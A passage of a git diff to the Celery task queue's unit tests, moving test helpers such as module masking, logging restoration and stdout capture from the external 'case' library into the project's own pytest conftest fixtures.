-from case.utils import get_logger_handlers
from celery import signals, uuid
from celery.app.log import TaskFormatter
@@ -15,6 +13,7 @@
get_task_logger, in_sighandler)
from celery.utils.log import logger as base_logger
from celery.utils.log import logger_isa, task_logger
+from t.unit import conftest
class test_TaskFormatter:
@@ -165,12 +164,10 @@ def test_get_logger_root(self):
logger = get_logger(base_logger.name)
assert logger.parent is logging.root
- @mock.restore_logging()
- def test_setup_logging_subsystem_misc(self):
+ def test_setup_logging_subsystem_misc(self, restore_logging):
self.app.log.setup_logging_subsystem(loglevel=None)
- @mock.restore_logging()
- def test_setup_logging_subsystem_misc2(self):
+ def test_setup_logging_subsystem_misc2(self, restore_logging):
self.app.conf.worker_hijack_root_logger = True
self.app.log.setup_logging_subsystem()
@@ -183,18 +180,15 @@ def test_configure_logger(self):
self.app.log._configure_logger(None, sys.stderr, None, '', False)
logger.handlers[:] = []
- @mock.restore_logging()
- def test_setup_logging_subsystem_colorize(self):
+ def test_setup_logging_subsystem_colorize(self, restore_logging):
self.app.log.setup_logging_subsystem(colorize=None)
self.app.log.setup_logging_subsystem(colorize=True)
- @mock.restore_logging()
- def test_setup_logging_subsystem_no_mputil(self):
- with mock.mask_modules('billiard.util'):
- self.app.log.setup_logging_subsystem()
+ @pytest.mark.masked_modules('billiard.util')
+ def test_setup_logging_subsystem_no_mputil(self, restore_logging, mask_modules):
+ self.app.log.setup_logging_subsystem()
- @mock.restore_logging()
- def test_setup_logger(self):
+ def test_setup_logger(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False, colorize=True)
logger.handlers = []
@@ -202,16 +196,14 @@ def test_setup_logger(self):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False, colorize=None)
# setup_logger logs to stderr without logfile argument.
- assert (get_logger_handlers(logger)[0].stream is
+ assert (conftest.get_logger_handlers(logger)[0].stream is
sys.__stderr__)
- @mock.restore_logging()
- def test_setup_logger_no_handlers_stream(self):
+ def test_setup_logger_no_handlers_stream(self, restore_logging):
l = self.get_logger()
l.handlers = []
- with mock.stdouts() as outs:
- stdout, stderr = outs
+ with conftest.stdouts() as (stdout, stderr):
l = self.setup_logger(logfile=sys.stderr,
loglevel=logging.INFO, root=False)
l.info('The quick brown fox...')
@@ -221,7 +213,7 @@ def test_setup_logger_no_handlers_stream(self):
def test_setup_logger_no_handlers_file(self, *args):
tempfile = mktemp(suffix='unittest', prefix='celery')
with patch('builtins.open') as osopen:
- with mock.restore_logging():
+ with conftest.restore_logging_context_manager():
files = defaultdict(StringIO)
def open_file(filename, *args, **kwargs):
@@ -236,16 +228,15 @@ def open_file(filename, *args, **kwargs):
l = self.setup_logger(
logfile=tempfile, loglevel=logging.INFO, root=False,
)
- assert isinstance(get_logger_handlers(l)[0],
+ assert isinstance(conftest.get_logger_handlers(l)[0],
logging.FileHandler)
assert tempfile in files
- @mock.restore_logging()
- def test_redirect_stdouts(self):
+ def test_redirect_stdouts(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
try:
- with mock.wrap_logger(logger) as sio:
+ with conftest.wrap_logger(logger) as sio:
self.app.log.redirect_stdouts_to_logger(
logger, loglevel=logging.ERROR,
)
@@ -257,12 +248,11 @@ def test_redirect_stdouts(self):
finally:
sys.stdout, sys.stderr = sys.__stdout__, sys.__stderr__
- @mock.restore_logging()
- def test_logging_proxy(self):
+ def test_logging_proxy(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
- with mock.wrap_logger(logger) as sio:
+ with conftest.wrap_logger(logger) as sio:
p = LoggingProxy(logger, loglevel=logging.ERROR)
p.close()
p.write('foo')
@@ -281,17 +271,16 @@ def test_logging_proxy(self):
p.close()
assert not p.isatty()
- with mock.stdouts() as (stdout, stderr):
+ with conftest.stdouts() as (stdout, stderr):
with in_sighandler():
p.write('foo')
assert stderr.getvalue()
- @mock.restore_logging()
- def test_logging_proxy_bytes(self):
+ def test_logging_proxy_bytes(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
- with mock.wrap_logger(logger) as sio:
+ with conftest.wrap_logger(logger) as sio:
p = LoggingProxy(logger, loglevel=logging.ERROR)
p.close()
p.write(b'foo')
@@ -306,13 +295,12 @@ def test_logging_proxy_bytes(self):
p.close()
assert not p.isatty()
- with mock.stdouts() as (stdout, stderr):
+ with conftest.stdouts() as (stdout, stderr):
with in_sighandler():
p.write(b'foo')
assert stderr.getvalue()
- @mock.restore_logging()
- def test_logging_proxy_recurse_protection(self):
+ def test_logging_proxy_recurse_protection(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
p = LoggingProxy(logger, loglevel=logging.ERROR)
diff --git a/t/unit/app/test_schedules.py b/t/unit/app/test_schedules.py
index 881791a10ed..a8bed808a30 100644
--- a/t/unit/app/test_schedules.py
+++ b/t/unit/app/test_schedules.py
@@ -2,16 +2,16 @@
from contextlib import contextmanager
from datetime import datetime, timedelta
from pickle import dumps, loads
+from unittest import TestCase
from unittest.mock import Mock
import pytest
import pytz
-from case import Case
from celery.schedules import (ParseException, crontab, crontab_parser,
schedule, solar)
-assertions = Case('__init__')
+assertions = TestCase('__init__')
@contextmanager
diff --git a/t/unit/backends/test_cache.py b/t/unit/backends/test_cache.py
index 9e1ac5d29e4..40ae4277331 100644
--- a/t/unit/backends/test_cache.py
+++ b/t/unit/backends/test_cache.py
@@ -4,12 +4,12 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from kombu.utils.encoding import ensure_bytes, str_to_bytes
from celery import signature, states, uuid
from celery.backends.cache import CacheBackend, DummyClient, backends
from celery.exceptions import ImproperlyConfigured
+from t.unit import conftest
class SomeClass:
@@ -148,7 +148,7 @@ def test_regression_worker_startup_info(self):
'cache+memcached://127.0.0.1:11211;127.0.0.2:11211;127.0.0.3/'
)
worker = self.app.Worker()
- with mock.stdouts():
+ with conftest.stdouts():
worker.on_start()
assert worker.startup_info()
@@ -201,31 +201,31 @@ class test_get_best_memcache(MockCacheMixin):
def test_pylibmc(self):
with self.mock_pylibmc():
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
assert cache.get_best_memcache()[0].__module__ == 'pylibmc'
- def test_memcache(self):
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- assert (cache.get_best_memcache()[0]().__module__ ==
- 'memcache')
-
- def test_no_implementations(self):
- with mock.mask_modules('pylibmc', 'memcache'):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
- with pytest.raises(ImproperlyConfigured):
- cache.get_best_memcache()
+ assert (cache.get_best_memcache()[0]().__module__ ==
+ 'memcache')
+
+ @pytest.mark.masked_modules('pylibmc', 'memcache')
+ def test_no_implementations(self, mask_modules):
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ with pytest.raises(ImproperlyConfigured):
+ cache.get_best_memcache()
def test_cached(self):
with self.mock_pylibmc():
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
from celery.backends import cache
cache._imp = [None]
cache.get_best_memcache()[0](behaviors={'foo': 'bar'})
@@ -241,30 +241,30 @@ def test_backends(self):
class test_memcache_key(MockCacheMixin):
- def test_memcache_unicode_key(self):
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache_unicode_key(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- task_id, result = str(uuid()), 42
- b = cache.CacheBackend(backend='memcache', app=self.app)
- b.store_result(task_id, result, state=states.SUCCESS)
- assert b.get_result(task_id) == result
-
- def test_memcache_bytes_key(self):
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ task_id, result = str(uuid()), 42
+ b = cache.CacheBackend(backend='memcache', app=self.app)
+ b.store_result(task_id, result, state=states.SUCCESS)
+ assert b.get_result(task_id) == result
+
+ @pytest.mark.masked_modules('pylibmc')
+ def test_memcache_bytes_key(self, mask_modules):
with self.mock_memcache():
- with mock.reset_modules('celery.backends.cache'):
- with mock.mask_modules('pylibmc'):
- from celery.backends import cache
- cache._imp = [None]
- task_id, result = str_to_bytes(uuid()), 42
- b = cache.CacheBackend(backend='memcache', app=self.app)
- b.store_result(task_id, result, state=states.SUCCESS)
- assert b.get_result(task_id) == result
+ with conftest.reset_modules('celery.backends.cache'):
+ from celery.backends import cache
+ cache._imp = [None]
+ task_id, result = str_to_bytes(uuid()), 42
+ b = cache.CacheBackend(backend='memcache', app=self.app)
+ b.store_result(task_id, result, state=states.SUCCESS)
+ assert b.get_result(task_id) == result
def test_pylibmc_unicode_key(self):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
with self.mock_pylibmc():
from celery.backends import cache
cache._imp = [None]
@@ -274,7 +274,7 @@ def test_pylibmc_unicode_key(self):
assert b.get_result(task_id) == result
def test_pylibmc_bytes_key(self):
- with mock.reset_modules('celery.backends.cache'):
+ with conftest.reset_modules('celery.backends.cache'):
with self.mock_pylibmc():
from celery.backends import cache
cache._imp = [None]
diff --git a/t/unit/backends/test_cassandra.py b/t/unit/backends/test_cassandra.py
index 3e648bff0ed..5df53a1e576 100644
--- a/t/unit/backends/test_cassandra.py
+++ b/t/unit/backends/test_cassandra.py
@@ -3,7 +3,6 @@
from unittest.mock import Mock
import pytest
-from case import mock
from celery import states
from celery.exceptions import ImproperlyConfigured
@@ -17,7 +16,6 @@
]
-@mock.module(*CASSANDRA_MODULES)
class test_CassandraBackend:
def setup(self):
@@ -27,7 +25,8 @@ def setup(self):
cassandra_table='task_results',
)
- def test_init_no_cassandra(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_init_no_cassandra(self, module):
# should raise ImproperlyConfigured when no python-driver
# installed.
from celery.backends import cassandra as mod
@@ -38,7 +37,8 @@ def test_init_no_cassandra(self, *modules):
finally:
mod.cassandra = prev
- def test_init_with_and_without_LOCAL_QUROM(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_init_with_and_without_LOCAL_QUROM(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
@@ -60,12 +60,14 @@ def test_init_with_and_without_LOCAL_QUROM(self, *modules):
app=self.app, keyspace='b', column_family='c',
)
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
@pytest.mark.usefixtures('depends_on_current_app')
- def test_reduce(self, *modules):
+ def test_reduce(self, module):
from celery.backends.cassandra import CassandraBackend
assert loads(dumps(CassandraBackend(app=self.app)))
- def test_get_task_meta_for(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_get_task_meta_for(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
@@ -95,7 +97,8 @@ def test_as_uri(self):
x.as_uri()
x.as_uri(include_password=False)
- def test_store_result(self, *modules):
+ @pytest.mark.patched_module(*CASSANDRA_MODULES)
+ def test_store_result(self, module):
from celery.backends import cassandra as mod
mod.cassandra = Mock()
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index ee4d0517365..b56e928b026 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -4,7 +4,6 @@
import pytest
import pytz
-from case import mock
from kombu.exceptions import EncodeError
try:
@@ -15,6 +14,7 @@
from celery import states, uuid
from celery.backends.mongodb import Binary, InvalidDocument, MongoBackend
from celery.exceptions import ImproperlyConfigured
+from t.unit import conftest
COLLECTION = 'taskmeta_celery'
TASK_ID = uuid()
@@ -529,7 +529,7 @@ def test_regression_worker_startup_info(self):
'/work4us?replicaSet=rs&ssl=true'
)
worker = self.app.Worker()
- with mock.stdouts():
+ with conftest.stdouts():
worker.on_start()
assert worker.startup_info()
diff --git a/t/unit/backends/test_redis.py b/t/unit/backends/test_redis.py
index 13dcf2eee9a..f99fbc37a55 100644
--- a/t/unit/backends/test_redis.py
+++ b/t/unit/backends/test_redis.py
@@ -8,14 +8,15 @@
from unittest.mock import ANY, Mock, call, patch
import pytest
-from case import ContextMock, mock
from celery import signature, states, uuid
from celery.canvas import Signature
+from celery.contrib.testing.mocks import ContextMock
from celery.exceptions import (BackendStoreError, ChordError,
ImproperlyConfigured)
from celery.result import AsyncResult, GroupResult
from celery.utils.collections import AttributeDict
+from t.unit import conftest
def raise_on_second_call(mock, exc, *retval):
@@ -61,7 +62,7 @@ def execute(self):
return [step(*a, **kw) for step, a, kw in self.steps]
-class PubSub(mock.MockCallbacks):
+class PubSub(conftest.MockCallbacks):
def __init__(self, ignore_subscribe_messages=False):
self._subscribed_to = set()
@@ -78,7 +79,7 @@ def get_message(self, timeout=None):
pass
-class Redis(mock.MockCallbacks):
+class Redis(conftest.MockCallbacks):
Connection = Connection
Pipeline = Pipeline
pubsub = PubSub
@@ -158,7 +159,7 @@ def zcount(self, key, min_, max_):
return len(self.zrangebyscore(key, min_, max_))
-class Sentinel(mock.MockCallbacks):
+class Sentinel(conftest.MockCallbacks):
def __init__(self, sentinels, min_other_sentinels=0, sentinel_kwargs=None,
**connection_kwargs):
self.sentinel_kwargs = sentinel_kwargs
diff --git a/t/unit/concurrency/test_prefork.py b/t/unit/concurrency/test_prefork.py
index 713b63d7baf..2e2a47353b7 100644
--- a/t/unit/concurrency/test_prefork.py
+++ b/t/unit/concurrency/test_prefork.py
@@ -5,7 +5,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
import t.skip
from celery.app.defaults import DEFAULTS
@@ -64,55 +63,53 @@ def Loader(*args, **kwargs):
return loader
@patch('celery.platforms.signals')
- def test_process_initializer(self, _signals, set_mp_process_title):
- with mock.restore_logging():
- from celery import signals
- from celery._state import _tls
- from celery.concurrency.prefork import (WORKER_SIGIGNORE,
- WORKER_SIGRESET,
- process_initializer)
- on_worker_process_init = Mock()
- signals.worker_process_init.connect(on_worker_process_init)
-
- with self.Celery(loader=self.Loader) as app:
- app.conf = AttributeDict(DEFAULTS)
- process_initializer(app, 'awesome.worker.com')
- _signals.ignore.assert_any_call(*WORKER_SIGIGNORE)
- _signals.reset.assert_any_call(*WORKER_SIGRESET)
- assert app.loader.init_worker.call_count
- on_worker_process_init.assert_called()
- assert _tls.current_app is app
- set_mp_process_title.assert_called_with(
- 'celeryd', hostname='awesome.worker.com',
- )
-
- with patch('celery.app.trace.setup_worker_optimizations') as S:
- os.environ['FORKED_BY_MULTIPROCESSING'] = '1'
- try:
- process_initializer(app, 'luke.worker.com')
- S.assert_called_with(app, 'luke.worker.com')
- finally:
- os.environ.pop('FORKED_BY_MULTIPROCESSING', None)
+ def test_process_initializer(self, _signals, set_mp_process_title, restore_logging):
+ from celery import signals
+ from celery._state import _tls
+ from celery.concurrency.prefork import (WORKER_SIGIGNORE,
+ WORKER_SIGRESET,
+ process_initializer)
+ on_worker_process_init = Mock()
+ signals.worker_process_init.connect(on_worker_process_init)
+
+ with self.Celery(loader=self.Loader) as app:
+ app.conf = AttributeDict(DEFAULTS)
+ process_initializer(app, 'awesome.worker.com')
+ _signals.ignore.assert_any_call(*WORKER_SIGIGNORE)
+ _signals.reset.assert_any_call(*WORKER_SIGRESET)
+ assert app.loader.init_worker.call_count
+ on_worker_process_init.assert_called()
+ assert _tls.current_app is app
+ set_mp_process_title.assert_called_with(
+ 'celeryd', hostname='awesome.worker.com',
+ )
- os.environ['CELERY_LOG_FILE'] = 'worker%I.log'
- app.log.setup = Mock(name='log_setup')
+ with patch('celery.app.trace.setup_worker_optimizations') as S:
+ os.environ['FORKED_BY_MULTIPROCESSING'] = '1'
try:
process_initializer(app, 'luke.worker.com')
+ S.assert_called_with(app, 'luke.worker.com')
finally:
- os.environ.pop('CELERY_LOG_FILE', None)
+ os.environ.pop('FORKED_BY_MULTIPROCESSING', None)
+
+ os.environ['CELERY_LOG_FILE'] = 'worker%I.log'
+ app.log.setup = Mock(name='log_setup')
+ try:
+ process_initializer(app, 'luke.worker.com')
+ finally:
+ os.environ.pop('CELERY_LOG_FILE', None)
@patch('celery.platforms.set_pdeathsig')
- def test_pdeath_sig(self, _set_pdeathsig, set_mp_process_title):
- with mock.restore_logging():
- from celery import signals
- on_worker_process_init = Mock()
- signals.worker_process_init.connect(on_worker_process_init)
- from celery.concurrency.prefork import process_initializer
-
- with self.Celery(loader=self.Loader) as app:
- app.conf = AttributeDict(DEFAULTS)
- process_initializer(app, 'awesome.worker.com')
- _set_pdeathsig.assert_called_once_with('SIGKILL')
+ def test_pdeath_sig(self, _set_pdeathsig, set_mp_process_title, restore_logging):
+ from celery import signals
+ on_worker_process_init = Mock()
+ signals.worker_process_init.connect(on_worker_process_init)
+ from celery.concurrency.prefork import process_initializer
+
+ with self.Celery(loader=self.Loader) as app:
+ app.conf = AttributeDict(DEFAULTS)
+ process_initializer(app, 'awesome.worker.com')
+ _set_pdeathsig.assert_called_once_with('SIGKILL')
class test_process_destructor:
diff --git a/t/unit/conftest.py b/t/unit/conftest.py
index 90dc50682d5..458e9a2ebf0 100644
--- a/t/unit/conftest.py
+++ b/t/unit/conftest.py
@@ -1,13 +1,19 @@
+import builtins
+import inspect
+import io
import logging
import os
+import platform
import sys
import threading
+import types
import warnings
-from importlib import import_module
-from unittest.mock import Mock
+from contextlib import contextmanager
+from functools import wraps
+from importlib import import_module, reload
+from unittest.mock import MagicMock, Mock, patch
import pytest
-from case.utils import decorator
from kombu import Queue
from celery.backends.cache import CacheBackend, DummyClient
@@ -39,6 +45,24 @@ class WindowsError(Exception):
CASE_LOG_LEVEL_EFFECT = 'Test {0} modified the level of the root logger'
CASE_LOG_HANDLER_EFFECT = 'Test {0} modified handlers for the root logger'
+_SIO_write = io.StringIO.write
+_SIO_init = io.StringIO.__init__
+
+SENTINEL = object()
+
+
+def noop(*args, **kwargs):
+ pass
+
+
+class WhateverIO(io.StringIO):
+
+ def __init__(self, v=None, *a, **kw):
+ _SIO_init(self, v.decode() if isinstance(v, bytes) else v, *a, **kw)
+
+ def write(self, data):
+ _SIO_write(self, data.decode() if isinstance(data, bytes) else data)
+
@pytest.fixture(scope='session')
def celery_config():
@@ -88,7 +112,7 @@ def reset_cache_backend_state(celery_app):
backend._cache.clear()
-@decorator
+@contextmanager
def assert_signal_called(signal, **expected):
"""Context that verifes signal is called before exiting."""
handler = Mock()
@@ -113,7 +137,6 @@ def app(celery_app):
def AAA_disable_multiprocessing():
# pytest-cov breaks if a multiprocessing.Process is started,
# so disable them completely to make sure it doesn't happen.
- from unittest.mock import patch
stuff = [
'multiprocessing.Process',
'billiard.Process',
@@ -326,3 +349,447 @@ def import_all_modules(name=__name__, file=__file__,
'Ignored error importing module {}: {!r}'.format(
module, exc,
)))
+
+
+@pytest.fixture
+def sleepdeprived(request):
+ """Mock sleep method in patched module to do nothing.
+
+ Example:
+ >>> import time
+ >>> @pytest.mark.sleepdeprived_patched_module(time)
+ >>> def test_foo(self, sleepdeprived):
+ >>> pass
+ """
+ module = request.node.get_closest_marker(
+ "sleepdeprived_patched_module").args[0]
+ old_sleep, module.sleep = module.sleep, noop
+ try:
+ yield
+ finally:
+ module.sleep = old_sleep
+
+
+# Taken from
+# http://bitbucket.org/runeh/snippets/src/tip/missing_modules.py
+@pytest.fixture
+def mask_modules(request):
+ """Ban some modules from being importable inside the context
+ For example::
+ >>> @pytest.mark.masked_modules('gevent.monkey')
+ >>> def test_foo(self, mask_modules):
+ ... try:
+ ... import sys
+ ... except ImportError:
+ ... print('sys not found')
+ sys not found
+ """
+ realimport = builtins.__import__
+ modnames = request.node.get_closest_marker("masked_modules").args
+
+ def myimp(name, *args, **kwargs):
+ if name in modnames:
+ raise ImportError('No module named %s' % name)
+ else:
+ return realimport(name, *args, **kwargs)
+
+ builtins.__import__ = myimp
+ try:
+ yield
+ finally:
+ builtins.__import__ = realimport
+
+
+@pytest.fixture
+def environ(request):
+ """Mock environment variable value.
+ Example::
+ >>> @pytest.mark.patched_environ('DJANGO_SETTINGS_MODULE', 'proj.settings')
+ >>> def test_other_settings(self, environ):
+ ... ...
+ """
+ env_name, env_value = request.node.get_closest_marker("patched_environ").args
+ prev_val = os.environ.get(env_name, SENTINEL)
+ os.environ[env_name] = env_value
+ try:
+ yield
+ finally:
+ if prev_val is SENTINEL:
+ os.environ.pop(env_name, None)
+ else:
+ os.environ[env_name] = prev_val
+
+
+def replace_module_value(module, name, value=None):
+ """Mock module value, given a module, attribute name and value.
+
+ Example::
+
+ >>> replace_module_value(module, 'CONSTANT', 3.03)
+ """
+ has_prev = hasattr(module, name)
+ prev = getattr(module, name, None)
+ if value:
+ setattr(module, name, value)
+ else:
+ try:
+ delattr(module, name)
+ except AttributeError:
+ pass
+ try:
+ yield
+ finally:
+ if prev is not None:
+ setattr(module, name, prev)
+ if not has_prev:
+ try:
+ delattr(module, name)
+ except AttributeError:
+ pass
+
+
+@contextmanager
+def platform_pyimp(value=None):
+ """Mock :data:`platform.python_implementation`
+ Example::
+ >>> with platform_pyimp('PyPy'):
+ ... ...
+ """
+ yield from replace_module_value(platform, 'python_implementation', value)
+
+
+@contextmanager
+def sys_platform(value=None):
+ """Mock :data:`sys.platform`
+
+ Example::
+ >>> mock.sys_platform('darwin'):
+ ... ...
+ """
+ prev, sys.platform = sys.platform, value
+ try:
+ yield
+ finally:
+ sys.platform = prev
+
+
+@contextmanager
+def pypy_version(value=None):
+ """Mock :data:`sys.pypy_version_info`
+
+ Example::
+ >>> with pypy_version((3, 6, 1)):
+ ... ...
+ """
+ yield from replace_module_value(sys, 'pypy_version_info', value)
+
+
+def _restore_logging():
+ outs = sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__
+ root = logging.getLogger()
+ level = root.level
+ handlers = root.handlers
+
+ try:
+ yield
+ finally:
+ sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__ = outs
+ root.level = level
+ root.handlers[:] = handlers
+
+
+@contextmanager
+def restore_logging_context_manager():
+ """Restore root logger handlers after test returns.
+ Example::
+ >>> with restore_logging_context_manager():
+ ... setup_logging()
+ """
+ yield from _restore_logging()
+
+
+@pytest.fixture
+def restore_logging(request):
+ """Restore root logger handlers after test returns.
+ Example::
+ >>> def test_foo(self, restore_logging):
+ ... setup_logging()
+ """
+ yield from _restore_logging()
+
+
+@pytest.fixture
+def module(request):
+ """Mock one or modules such that every attribute is a :class:`Mock`."""
+ yield from _module(*request.node.get_closest_marker("patched_module").args)
+
+
+@contextmanager
+def module_context_manager(*names):
+ """Mock one or modules such that every attribute is a :class:`Mock`."""
+ yield from _module(*names)
+
+
+def _module(*names):
+ prev = {}
+
+ class MockModule(types.ModuleType):
+
+ def __getattr__(self, attr):
+ setattr(self, attr, Mock())
+ return types.ModuleType.__getattribute__(self, attr)
+
+ mods = []
+ for name in names:
+ try:
+ prev[name] = sys.modules[name]
+ except KeyError:
+ pass
+ mod = sys.modules[name] = MockModule(name)
+ mods.append(mod)
+ try:
+ yield mods
+ finally:
+ for name in names:
+ try:
+ sys.modules[name] = prev[name]
+ except KeyError:
+ try:
+ del(sys.modules[name])
+ except KeyError:
+ pass
+
+
+class _patching:
+
+ def __init__(self, monkeypatch, request):
+ self.monkeypatch = monkeypatch
+ self.request = request
+
+ def __getattr__(self, name):
+ return getattr(self.monkeypatch, name)
+
+ def __call__(self, path, value=SENTINEL, name=None,
+ new=MagicMock, **kwargs):
+ value = self._value_or_mock(value, new, name, path, **kwargs)
+ self.monkeypatch.setattr(path, value)
+ return value
+
+ def object(self, target, attribute, *args, **kwargs):
+ return _wrap_context(
+ patch.object(target, attribute, *args, **kwargs),
+ self.request)
+
+ def _value_or_mock(self, value, new, name, path, **kwargs):
+ if value is SENTINEL:
+ value = new(name=name or path.rpartition('.')[2])
+ for k, v in kwargs.items():
+ setattr(value, k, v)
+ return value
+
+ def setattr(self, target, name=SENTINEL, value=SENTINEL, **kwargs):
+ # alias to __call__ with the interface of pytest.monkeypatch.setattr
+ if value is SENTINEL:
+ value, name = name, None
+ return self(target, value, name=name)
+
+ def setitem(self, dic, name, value=SENTINEL, new=MagicMock, **kwargs):
+ # same as pytest.monkeypatch.setattr but default value is MagicMock
+ value = self._value_or_mock(value, new, name, dic, **kwargs)
+ self.monkeypatch.setitem(dic, name, value)
+ return value
+
+ def modules(self, *mods):
+ modules = []
+ for mod in mods:
+ mod = mod.split('.')
+ modules.extend(reversed([
+ '.'.join(mod[:-i] if i else mod) for i in range(len(mod))
+ ]))
+ modules = sorted(set(modules))
+ return _wrap_context(module_context_manager(*modules), self.request)
+
+
+def _wrap_context(context, request):
+ ret = context.__enter__()
+
+ def fin():
+ context.__exit__(*sys.exc_info())
+ request.addfinalizer(fin)
+ return ret
+
+
+@pytest.fixture()
+def patching(monkeypatch, request):
+ """Monkeypath.setattr shortcut.
+ Example:
+ .. code-block:: python
+ >>> def test_foo(patching):
+ >>> # execv value here will be mock.MagicMock by default.
+ >>> execv = patching('os.execv')
+ >>> patching('sys.platform', 'darwin') # set concrete value
+ >>> patching.setenv('DJANGO_SETTINGS_MODULE', 'x.settings')
+ >>> # val will be of type mock.MagicMock by default
+ >>> val = patching.setitem('path.to.dict', 'KEY')
+ """
+ return _patching(monkeypatch, request)
+
+
+@contextmanager
+def stdouts():
+ """Override `sys.stdout` and `sys.stderr` with `StringIO`
+ instances.
+ >>> with conftest.stdouts() as (stdout, stderr):
+ ... something()
+ ... self.assertIn('foo', stdout.getvalue())
+ """
+ prev_out, prev_err = sys.stdout, sys.stderr
+ prev_rout, prev_rerr = sys.__stdout__, sys.__stderr__
+ mystdout, mystderr = WhateverIO(), WhateverIO()
+ sys.stdout = sys.__stdout__ = mystdout
+ sys.stderr = sys.__stderr__ = mystderr
+
+ try:
+ yield mystdout, mystderr
+ finally:
+ sys.stdout = prev_out
+ sys.stderr = prev_err
+ sys.__stdout__ = prev_rout
+ sys.__stderr__ = prev_rerr
+
+
+@contextmanager
+def reset_modules(*modules):
+ """Remove modules from :data:`sys.modules` by name,
+ and reset back again when the test/context returns.
+ Example::
+ >>> with conftest.reset_modules('celery.result', 'celery.app.base'):
+ ... pass
+ """
+ prev = {
+ k: sys.modules.pop(k) for k in modules if k in sys.modules
+ }
+
+ try:
+ for k in modules:
+ reload(import_module(k))
+ yield
+ finally:
+ sys.modules.update(prev)
+
+
+def get_logger_handlers(logger):
+ return [
+ h for h in logger.handlers
+ if not isinstance(h, logging.NullHandler)
+ ]
+
+
+@contextmanager
+def wrap_logger(logger, loglevel=logging.ERROR):
+ """Wrap :class:`logging.Logger` with a StringIO() handler.
+ yields a StringIO handle.
+ Example::
+ >>> with conftest.wrap_logger(logger, loglevel=logging.DEBUG) as sio:
+ ... ...
+ ... sio.getvalue()
+ """
+ old_handlers = get_logger_handlers(logger)
+ sio = WhateverIO()
+ siohandler = logging.StreamHandler(sio)
+ logger.handlers = [siohandler]
+
+ try:
+ yield sio
+ finally:
+ logger.handlers = old_handlers
+
+
+@contextmanager
+def _mock_context(mock):
+ context = mock.return_value = Mock()
+ context.__enter__ = Mock()
+ context.__exit__ = Mock()
+
+ def on_exit(*x):
+ if x[0]:
+ raise x[0] from x[1]
+ context.__exit__.side_effect = on_exit
+ context.__enter__.return_value = context
+ try:
+ yield context
+ finally:
+ context.reset()
+
+
+@contextmanager
+def open(side_effect=None):
+ """Patch builtins.open so that it returns StringIO object.
+ :param side_effect: Additional side effect for when the open context
+ is entered.
+ Example::
+ >>> with mock.open(io.BytesIO) as open_fh:
+ ... something_opening_and_writing_bytes_to_a_file()
+ ... self.assertIn(b'foo', open_fh.getvalue())
+ """
+ with patch('builtins.open') as open_:
+ with _mock_context(open_) as context:
+ if side_effect is not None:
+ context.__enter__.side_effect = side_effect
+ val = context.__enter__.return_value = WhateverIO()
+ val.__exit__ = Mock()
+ yield val
+
+
+@contextmanager
+def module_exists(*modules):
+ """Patch one or more modules to ensure they exist.
+ A module name with multiple paths (e.g. gevent.monkey) will
+ ensure all parent modules are also patched (``gevent`` +
+ ``gevent.monkey``).
+ Example::
+ >>> with conftest.module_exists('gevent.monkey'):
+ ... gevent.monkey.patch_all = Mock(name='patch_all')
+ ... ...
+ """
+ gen = []
+ old_modules = []
+ for module in modules:
+ if isinstance(module, str):
+ module = types.ModuleType(module)
+ gen.append(module)
+ if module.__name__ in sys.modules:
+ old_modules.append(sys.modules[module.__name__])
+ sys.modules[module.__name__] = module
+ name = module.__name__
+ if '.' in name:
+ parent, _, attr = name.rpartition('.')
+ setattr(sys.modules[parent], attr, module)
+ try:
+ yield
+ finally:
+ for module in gen:
+ sys.modules.pop(module.__name__, None)
+ for module in old_modules:
+ sys.modules[module.__name__] = module
+
+
+def _bind(f, o):
+ @wraps(f)
+ def bound_meth(*fargs, **fkwargs):
+ return f(o, *fargs, **fkwargs)
+ return bound_meth
+
+
+class MockCallbacks:
+
+ def __new__(cls, *args, **kwargs):
+ r = Mock(name=cls.__name__)
+ cls.__init__(r, *args, **kwargs)
+ for key, value in vars(cls).items():
+ if key not in ('__dict__', '__weakref__', '__new__', '__init__'):
+ if inspect.ismethod(value) or inspect.isfunction(value):
+ r.__getattr__(key).side_effect = _bind(value, r)
+ else:
+ r.__setattr__(key, value)
+ return r
diff --git a/t/unit/contrib/test_migrate.py b/t/unit/contrib/test_migrate.py
index e36e2f32751..2e395057462 100644
